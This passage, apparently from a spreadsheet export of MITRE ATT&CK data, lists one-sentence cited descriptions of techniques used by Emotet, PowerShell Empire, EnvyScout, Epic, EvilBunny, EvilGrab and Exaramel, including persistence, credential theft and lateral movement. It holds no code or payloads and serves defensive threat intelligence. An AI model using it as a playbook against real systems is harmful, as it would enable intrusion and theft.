    <t>[Emotet](https://attack.mitre.org/software/S0367) has used Powershell to retrieve the malicious payload and download additional resources like [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Symantec Emotet Jul 2018)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Red Canary Emotet Feb 2019)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed enumerating local processes.(Citation: ASEC Emotet 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been observed adding the downloaded payload to the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key to maintain persistence.(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) leverages the Admin$ share for lateral movement once the local admin password has been brute forced. (Citation: Malwarebytes Emotet Dec 2017) </t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has maintained persistence through a scheduled task. (Citation: US-CERT Emotet Jul 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used custom packers to protect its payloads.(Citation: Trend Micro Emotet Jan 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing links. (Citation: Trend Micro Banking Malware Jan 2019)(Citation: Kaspersky Emotet Jan 2019)(Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Talos Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. (Citation: Symantec Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used cmd.exe to run a PowerShell script. (Citation: Picus Emotet Dec 2018)</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) has used WMI to execute powershell.exe.(Citation: Carbon Black Emotet Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Emotet](https://attack.mitre.org/software/S0367) has been observed creating new services to maintain persistence. (Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; to manipulate access tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can ZIP directories on the target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use TLS to encrypt its C2 channel.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can automatically gather the username, domain name, machine name, and other information from a compromised system.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to automatically send collected data back to the threat actors' C2.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox and GitHub for C2.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to gather browser data such as bookmarks and visited sites.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules to attempt to bypass UAC for escalation of privileges.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can harvest clipboard data on both Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses a command-line interface to interact with systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;Invoke-RunAs&lt;/code&gt; to make tokens.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains some modules that leverage API hooking to carry out tasks, such as netripper.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use various modules to search for files containing passwords.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules that extract passwords from common web browsers such as Firefox and Chrome.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit various DLL hijacking opportunities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize &lt;code&gt;Invoke-DCOM&lt;/code&gt; to leverage remote COM execution for lateral movement.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a new domain user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for enumerating domain trusts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a dylib hijacker module that generates a malicious dylib given the path to a legitimate dylib of a vulnerable application.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use GitHub for data exfiltration.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can exploit vulnerabilities such as MS16-032 and MS16-135.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for finding files of interest on hosts and network shares.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use golden tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes various modules for enumerating Group Policy.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; to modify a GPO that will install and execute a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can upload and download to and from a victim machine.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; to request service tickets and return crackable ticket hashes.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes keylogging capabilities for Windows, Linux, and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: Github PowerShell Empire)(Citation: GitHub Inveigh)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a local user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to collect emails on a target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use built-in modules to abuse trusted utilities like MSBuild.exe.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains a variety of enumeration modules that have an option to use API calls to carry out tasks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform port scans from an infected host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find shared drives on the local system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can be used to conduct packet captures on target hosts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to obfuscate commands using &lt;code&gt;Invoke-Obfuscation&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform pass the hash attacks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit search order hijacking vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit unquoted path vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) leverages PowerShell for the majority of its client-side agent tasks. [Empire](https://attack.mitre.org/software/S0363) also contains the ability to conduct PowerShell remoting with the &lt;code&gt;Invoke-PSRemoting&lt;/code&gt; module.(Citation: Github PowerShell Empire)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules like &lt;code&gt;Invoke-SessionGopher&lt;/code&gt; to extract private key and session information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find information about processes running on local and remote systems.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can modify the registry run keys &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can add a SID-History to a user if on a domain controller.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules for executing commands over SSH as well as in-memory VNC agent injection.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules to interact with the Windows task scheduler.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is capable of capturing screenshots on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate antivirus software on the target.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate Security Support Providers (SSPs) as well as utilize [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; and &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; to install malicious SSPs and log authentication events.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can persist by modifying a .LNK file to include a backdoor.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use silver tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate host system information like OS, architecture, domain name, applied patches, and more.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire network configuration information like DNS servers, public IP, and network proxies used by a host.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the current network connections of a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the username on targeted hosts.(Citation: Talos Frankenstein June 2019)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can capture webcam data on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for executing scripts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use WMI to deliver a payload to a remote host.(Citation: Github PowerShell Empire) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize built-in modules to modify service binaries and restore them to their original state.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can collect sensitive NTLM material from a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can deobfuscate and write malicious ISO files to disk.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can call &lt;code&gt;window.location.pathname&lt;/code&gt; to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use hidden directories and files to hide malicious executables.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has been executed through malicious files attached to e-mails.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has used folder icons for malicious files to lure victims into opening them.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can Base64 encode payloads.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has the ability to proxy execution of malicious files with Rundll32.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) has been distributed via spearphishing as an email attachment.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can determine whether the ISO payload was received by a Windows or iOS device.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[EnvyScout](https://attack.mitre.org/software/S0634) can use cmd.exe to execute malicious files on compromised hosts.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts collected data using a public key framework before sending it over the C2 channel.(Citation: Kaspersky Turla) Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) compresses the collected data with bzip2 before sending it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used valid digital certificates from Sysprint AG to sign its [Epic](https://attack.mitre.org/software/S0091) dropper.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.(Citation: ESET Recon Snake Nest)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has a command to delete a file from the machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers a list of all user accounts, privilege classes, and time of last logon.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers information on local group names.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) heavily obfuscates its code to make analysis more difficult.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /v&lt;/code&gt; command to obtain a list of processes.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;rem reg query&lt;/code&gt; command to obtain values from Registry keys.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net view&lt;/code&gt; command on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts commands from the C2 server using a hardcoded key.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;nbtstat -n&lt;/code&gt; and &lt;code&gt;nbtstat -s&lt;/code&gt; commands on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net session&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; commands to gather information on network connections.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the user name from the victim’s machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /svc&lt;/code&gt; command to list the services on the system.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net time&lt;/code&gt; command  to get the system time from the machine and collect the current date and time zone information.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has deleted the initial dropper after running through the environment checks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used EnumProcesses() to identify how many process are running in the environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396) has created Registry keys for persistence in &lt;code&gt;[HKLM|HKCU]\…\CurrentVersion\Run&lt;/code&gt;.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed commands via scheduled tasks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has been observed querying installed antivirus software.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[EvilBunny](https://attack.mitre.org/software/S0396)'s dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.(Citation: Cyphort EvilBunny Dec 2014)	</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has an integrated scripting engine to download and execute Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used WMI to gather information about the system.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture audio from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture keystrokes.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) adds a Registry Run key for ctfmon.exe to establish persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture screenshots.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture video from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses crontab for persistence if it does not have root privileges.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can decrypt its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can attempt to find a new C2 server if it receives an error.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can uninstall its persistence mechanism and delete its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to download a file from  and to a remote C2 server.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses RC4 for encrypting the configuration.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can execute commands with high privileges via a specific binary with setuid functionality.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can run &lt;code&gt;whoami&lt;/code&gt; to identify the system owner.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to execute a shell command on the system.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) automatically encrypts files before sending them to the C2 server.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) specifies a path to store files scheduled for exfiltration.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) adds the configuration to the Registry in XML format.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to execute VBS scripts on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to launch a remote shell and executes commands on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
